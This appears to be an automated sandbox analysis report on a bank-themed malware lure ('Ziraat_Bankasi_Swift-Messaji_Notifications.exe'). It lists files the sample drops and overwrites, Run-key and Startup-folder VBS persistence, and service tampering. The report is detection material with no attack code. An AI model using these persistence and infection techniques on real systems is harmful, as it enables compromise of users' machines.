Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Users\user\AppData\Local\differences\niellist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\differences\niellist.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
